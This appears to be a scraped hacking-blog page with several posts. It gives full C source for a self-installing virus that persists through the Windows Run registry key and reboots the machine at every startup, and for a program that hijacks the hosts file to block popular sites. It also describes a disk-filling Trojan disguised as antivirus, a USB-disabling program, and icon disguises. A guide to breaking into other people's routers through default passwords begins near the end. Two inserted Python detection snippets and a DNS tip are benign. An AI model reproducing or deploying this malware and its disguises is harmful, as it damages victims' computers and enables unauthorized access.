Friday, July 2, 2010

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.




For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing: none of the antivirus software detects this as a virus, since I have coded this virus in C. So if you are familiar with the C language, it is easy to understand the logic behind the code.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}


Compiling The Source Code Into Executable Virus.





1. Download the Source Code Here



2. The downloaded file will be Sysres.C



3. For a step-by-step compilation guide, refer to my post How to compile C Programs.





Testing And Removing The Virus From Your PC





You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.





1. Reboot your computer in the SAFE MODE



2. Goto
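The program in this post persists through a `sres` value under the HKCU `Run` key that points at `sysres.exe` in `\windows\system`. As an added example (not part of the original post), the Python check below parses the text output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags such entries; the sample output is constructed, and treating any autostart target in the legacy `\Windows\System` directory as suspect is an assumed heuristic.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg query` output for the HKCU Run key.
SAMPLE = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    sres    REG_SZ    C:\windows\system\sysres.exe
    Updater    REG_EXPAND_SZ    %ProgramFiles%\Vendor\update.exe /silent
'''

# reg.exe separates value name, type and data with four spaces.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# Heuristic (assumption): the legacy \Windows\System directory is not a normal
# home for autostart programs, so a Run value pointing there is suspect.
LEGACY_SYSTEM = re.compile(r"^[a-z]:\\windows\\system\\[^\\]+\.exe$", re.I)


def command_path(data):
    """Extract the executable path from a Run value, quoted or not."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    # Unquoted: take everything up to and including the first ".exe".
    m = re.match(r"(.+?\.exe)\b", data, re.I)
    return m.group(1) if m else data.split(" ", 1)[0]


def audit_run_key(reg_query_output, known_bad_names=("sysres.exe",)):
    """Return (value_name, path, reasons) for each suspicious Run entry."""
    findings = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        path = command_path(m["data"])
        exe = PureWindowsPath(path).name.lower()
        reasons = []
        if exe in known_bad_names:
            reasons.append("file name matches the dropped copy")
        if LEGACY_SYSTEM.match(path):
            reasons.append("autostart target in legacy \\Windows\\System")
        if reasons:
            findings.append((m["name"], path, reasons))
    return findings
```

Because the program reboots the machine as soon as the desktop loads, this check is most useful when run from Safe Mode or against an offline copy of the user's registry hive.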

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.




This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he reinstalls the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any browser program.



NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website?

Here is the source code of the virus.



#include

#include

#include



char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;



int find_root(void);

void block_site(void);



int find_root()

{

int done;

struct ffblk ffblk;//File block structure



done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



else return 0;

}



void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/



fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}



void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}



How to Compile ?



For a step-by-step compilation guide, refer to my post How to compile C Programs.



Testing



1. To test, run the compiled module. It will block the sites that are listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing the error “Page cannot be displayed”.

3. To remove the virus, type the following in the Run dialog.

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this

127.0.0.1 google.com

5. Delete all such entries which contain the names of blocked sites.
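The manual cleanup in steps 3 to 5 can be checked mechanically. As an added example (not part of the original post), the Python code below audits hosts-file text for names redirected to a loopback address, as the program above does with `127.0.0.1`; it generalizes slightly by also flagging `0.0.0.0` and IPv6 equivalents, and the sample file contents are constructed.

```python
import ipaddress

# Constructed sample hosts file: stock entries followed by appended
# redirects of the kind this post's program writes.
SAMPLE_HOSTS = """\
# Copyright (c) Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5\tbuild.corp.example   # internal server

127.0.0.1\tgoogle.com
127.0.0.1\twww.google.com
0.0.0.0 youtube.com www.youtube.com
"""

# Names that legitimately resolve to loopback.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def is_sinkhole(addr):
    """True for loopback or unspecified addresses (127.0.0.0/8, ::1, 0.0.0.0, ::)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def audit_hosts(text):
    """Return (line_no, address, hostname) for names redirected to a sinkhole."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].split()  # drop comments, split on any whitespace
        if len(entry) < 2:
            continue
        addr, names = entry[0], entry[1:]
        if not is_sinkhole(addr):
            continue
        for name in names:
            if name.lower() not in LOCAL_NAMES:
                findings.append((line_no, addr, name.lower()))
    return findings


def cleaned(text):
    """Return the hosts text with every flagged line removed (step 5 above)."""
    bad = {line_no for line_no, _, _ in audit_hosts(text)}
    return "\n".join(l for n, l in enumerate(text.splitlines(), 1) if n not in bad) + "\n"
```

Hosts files maintained for ad blocking contain the same pattern on purpose, so review the findings before writing `cleaned()` output back.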



NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file?

How to Make a Trojan Horse

Most of you may be curious to know how to make a Trojan or virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using the C programming language. This Trojan, when executed, will eat up the hard disk space on the root drive (the drive on which Windows is installed, usually the C: drive) of the computer on which it is run. Also, this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this the Space Eater Trojan. Since this Trojan is written using a high-level programming language, it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…




Before I move on to explain the features of this Trojan, you need to know what exactly a Trojan horse is and how it works. Contrary to what most of us think, a Trojan or Trojan horse is not a virus. In simple words, a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or cause damage to the computer.





Now let’s move to the working of our Trojan



The Trojan horse which I have made presents itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space is too high. As a result, the disk gets filled up to 100% within minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension, it is often ignored by disk cleanup software. So for the victim, there is no way to recover the hard disk space short of reformatting his drive.





The algorithm of the Trojan is as follows



1. Search for the root drive



2. Navigate to Windows\System32 on the root drive



3. Create the file named “spceshot.dll”



4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full



5. Once the drive is full, stop the process.



You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.




Once this virus is executed, it will immediately disable all the USB ports on the computer. As a result, you will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.



1. Download the USB_Block.rar file on to your computer.



2. It contains the following 4 files.



■block_usb.c (source code)

■unblock_usb.c (source code)

3. You need to compile them before you can run them. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.



3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).



4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.



5. You can also change the icon of this file to make it look like a legitimate program. For more details on this, refer to my post – How to Change the ICON of an EXE file (This step is also optional).



I hope you like this post. Please pass your comments.




Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The lookups take a long time and often just time out. The solution? There is a small hack on BSNL for this. Use third-party DNS servers instead of BSNL DNS servers, or run your own one like djbdns. The easiest option is to use OpenDNS. Just reconfigure your network to use the following DNS servers:




208.67.222.222

208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.




How to Hack an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet. However, most of them are unaware of the fact that these devices have a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.




Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.



Before you proceed, you need the following tool in the process



Angry IP Scanner



Here is detailed information on how to exploit the vulnerability of an ADSL router.



Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.



Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

A2HACK | ONE STOP OF HACKERS. Copyright 2008 All Rights Reserved